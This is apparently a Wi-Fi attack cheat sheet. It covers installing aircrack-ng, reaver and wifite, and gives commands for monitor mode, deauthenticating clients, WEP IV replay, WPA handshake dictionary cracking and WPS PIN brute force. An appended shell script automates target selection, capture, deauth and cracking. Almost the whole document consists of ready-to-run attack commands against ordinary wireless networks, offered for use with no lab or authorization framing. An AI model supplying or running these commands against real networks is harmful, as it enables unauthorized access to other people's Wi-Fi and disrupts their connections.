aircrack-ng

CentOS

$ sudo yum install "openssl-devel" "libnl3-devel" "iw" "ethtool" "pciutils" "tshark" "pyrit" "cowpatty"

Debian

$ sudo apt-get install "libssl-dev" "libnl-3-dev" "libnl-genl-3-dev" "iw" "ethtool" "tshark" "pyrit" "cowpatty"

http://aircrack-ng.org/

$ wget -c "http://download.aircrack-ng.org/aircrack-ng-1.2-rc3.tar.gz"
$ tar zxf "aircrack-ng-1.2-rc3.tar.gz"
$ cd "aircrack-ng-1.2-rc3"
$ make
$ sudo make install
$ cd ".."
$ sudo airodump-ng-oui-update

reaver

CentOS

$ sudo yum install "libpcap-devel" "sqlite-devel"

Debian

$ sudo apt-get install "libpcap-dev" "libsqlite3-dev"

https://code.google.com/p/reaver-wps/

$ wget -c "http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz"
$ tar zxf "reaver-1.4.tar.gz"
$ cd "reaver-1.4/src"
$ ./configure
$ make
$ sudo make install
$ cd "../.."

wifite

https://github.com/derv82/wifite/

$ wget -c "https://github.com/derv82/wifite/raw/master/wifite.py"
$ chmod +x "wifite.py"
$ sudo mv "wifite.py" "/usr/local/bin/wifite"

Scanning

Scan and show only APs with WPS enabled

$ wifite -wps

Scan only WEP-encrypted APs

$ wifite -wep

Specify a wordlist file

$ wifite -dict "/root/w/china_super_wpa_wordlist.txt"

List wireless interfaces

$ airmon-ng

Put wlan0 into monitor mode (creates the monitor interface mon0 used below)

$ airmon-ng start wlan0

List nearby APs and their channels

$ airodump-ng mon0

Capture packets from one AP on its channel (the second form saves only the IVs, which is all WEP cracking needs)

$ airodump-ng -c CHANNEL --write ESSID --bssid BSSID mon0
$ airodump-ng -c CHANNEL --write ESSID --bssid BSSID mon0 --ivs

Attacking

Send deauth frames to a client (it reconnects, so the WPA handshake can be captured)

$ aireplay-ng -0 5 -a BSSID -c CLIENT_MAC mon0

ARP-request replay against a WEP AP to generate new IVs (-h is the MAC of an associated client; this is attack -3, not a deauth)

$ aireplay-ng -3 -b BSSID -h CLIENT_MAC mon0

IV generation against WEP: fake-authenticate our card (-h) with the AP, then replay captured frames. The card must already be on the AP's channel (set it with airodump-ng -c or airmon-ng start wlan0 CHANNEL); -c takes a destination MAC, not a channel number.

$ aireplay-ng -1 0 -a "00:21:27:22:4c:2e" -h "00:1a:ef:0a:8e:bc" mon0
$ aireplay-ng -2 -F -p 0841 -c "ff:ff:ff:ff:ff:ff" -b "00:21:27:22:4C:2E" -h "00:1a:ef:0a:8e:bc" mon0

aireplay-ng attack modes (from the tool's own help output)

Attack modes (numbers can still be used):
--deauth      count : deauthenticate 1 or all stations (-0)
--fakeauth    delay : fake authentication with AP (-1)
--interactive       : interactive frame selection (-2)
--arpreplay         : standard ARP-request replay (-3)
--chopchop          : decrypt/chopchop WEP packet (-4)
--fragment          : generates valid keystream   (-5)
--caffe-latte       : query a client for new IVs  (-6)
--cfrag             : fragments against a client  (-7)
--migmode           : attacks WPA migration mode  (-8)
--test              : tests injection and quality (-9)

Cracking

Dictionary attack on a captured WPA handshake

$ aircrack-ng -w WORDLIST -b BSSID -e ESSID HANDSHAKE.cap

WPS PIN brute force with reaver (-s saves the session so it can be resumed, -p tries a specific PIN)

$ reaver -i mon0 -b BSSID -c CHANNEL -v -S -a -d 0 -t 10 -s /media/VM/crack/ESSID.wpc -p PIN

WPA handshake dictionary attack from Windows (Cygwin build of aircrack-ng)

"D:\aircrack-ng\bin\aircrack-ng.exe" -w "/cygdrive/h/Temp/Crack/w/china_super_wpa_wordlist.txt" -e "ESSID" -b "BSSID" "/cygdrive/h/Temp/Crack/cap/ESSID.cap"
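Tying the Scanning, Attacking and Cracking steps above together, here is an added example; it is not code from this page or from the aircrack-ng project. It is a POSIX shell wrapper that reads the CSV airodump-ng writes next to the .cap, finds a target's channel and lists networks by encryption type, validates MACs and channels before they reach the tools, and builds the capture, deauth and crack command lines. The CSV column layout, the sample CSV contents, the DRY_RUN knob and the function names are assumptions of this example, not something the page shows.

```shell
#!/bin/sh
# Added example, not code from the page or from the aircrack-ng project.
# Wraps the airodump-ng / aireplay-ng / aircrack-ng steps listed above.
# Assumptions made here: "airodump-ng --write PREFIX" also writes PREFIX-01.csv
# whose first section has the columns
#   BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher,
#   Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
# followed by a "Station MAC" section; the tools are on PATH; and DRY_RUN=1
# (the default, so nothing is transmitted by accident) only prints commands.
DRY_RUN=${DRY_RUN-1}

# Constructed sample of such a CSV (not a real capture): one WPA2 AP, one WEP AP,
# and one client associated with the WPA2 AP.
SAMPLE_CSV='BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2014-01-01 10:00:00, 2014-01-01 10:05:00,  6, 54, WPA2, CCMP, PSK, -40,      120,        0,   0.  0.  0.  0,   7, lab-ap1, 
AA:BB:CC:DD:EE:FF, 2014-01-01 10:00:00, 2014-01-01 10:05:00, 11, 54, WEP , WEP, , -70,       30,     1500,   0.  0.  0.  0,   7, lab-wep, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DE:AD:BE:EF:00:01, 2014-01-01 10:00:00, 2014-01-01 10:05:00, -50,      200, 00:11:22:33:44:55, lab-ap1
'

# Accept only a colon-separated 48-bit MAC; anything else never reaches the tools.
valid_mac() {
    printf '%s' "$1" | grep -Eiq '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'
}

# Channel on which airodump-ng saw the given BSSID (CSV on stdin); empty if absent.
channel_for_bssid() {
    awk -F', *' -v b="$1" 'toupper($1) == toupper(b) { gsub(/ /, "", $4); print $4; exit }'
}

# "BSSID channel privacy ESSID" for each AP whose Privacy column matches the
# pattern (WEP, WPA, OPN ...), CSV on stdin. Stops before the client section.
aps_with_privacy() {
    awk -F', *' -v p="$1" '
        /^Station MAC/ { exit }
        NR > 1 && NF >= 14 && $6 ~ p { gsub(/ /, "", $4); gsub(/ +$/, "", $6); print $1, $4, $6, $14 }'
}

# Print the command under DRY_RUN, otherwise execute it.
run() {
    if [ -n "$DRY_RUN" ]; then echo "$*"; else "$@"; fi
}

# airodump-ng capture of one AP, writing PREFIX-01.cap / PREFIX-01.csv.
capture_ap() {
    bssid=$1; channel=$2; prefix=$3; iface=${4:-mon0}
    valid_mac "$bssid" || { echo "bad BSSID: $bssid" >&2; return 1; }
    case $channel in ''|*[!0-9]*) echo "bad channel: $channel" >&2; return 1;; esac
    run airodump-ng -c "$channel" --bssid "$bssid" --write "$prefix" "$iface"
}

# Deauthenticate one client so it reconnects and the 4-way handshake is captured.
deauth_client() {
    bssid=$1; client=$2; count=${3:-5}; iface=${4:-mon0}
    { valid_mac "$bssid" && valid_mac "$client"; } || { echo "bad MAC" >&2; return 1; }
    run aireplay-ng -0 "$count" -a "$bssid" -c "$client" "$iface"
}

# Dictionary attack on the captured handshake; refuses a wordlist it cannot read.
crack_handshake() {
    wordlist=$1; bssid=$2; capfile=$3
    [ -r "$wordlist" ] || { echo "wordlist not readable: $wordlist" >&2; return 1; }
    valid_mac "$bssid" || { echo "bad BSSID: $bssid" >&2; return 1; }
    run aircrack-ng -w "$wordlist" -b "$bssid" "$capfile"
}

# Demo on the constructed CSV: list WEP networks, then plan the WPA2 attack.
printf '%s' "$SAMPLE_CSV" | aps_with_privacy WEP
ch=$(printf '%s' "$SAMPLE_CSV" | channel_for_bssid 00:11:22:33:44:55)
capture_ap 00:11:22:33:44:55 "$ch" lab-ap1
deauth_client 00:11:22:33:44:55 DE:AD:BE:EF:00:01
```

Run it as-is to see the planned commands; `DRY_RUN= sh wrap.sh` (empty value) executes them, which additionally needs root and a card already in monitor mode as mon0. Point `channel_for_bssid` and `aps_with_privacy` at the real `PREFIX-01.csv` from an `airodump-ng --write PREFIX` run instead of `SAMPLE_CSV`.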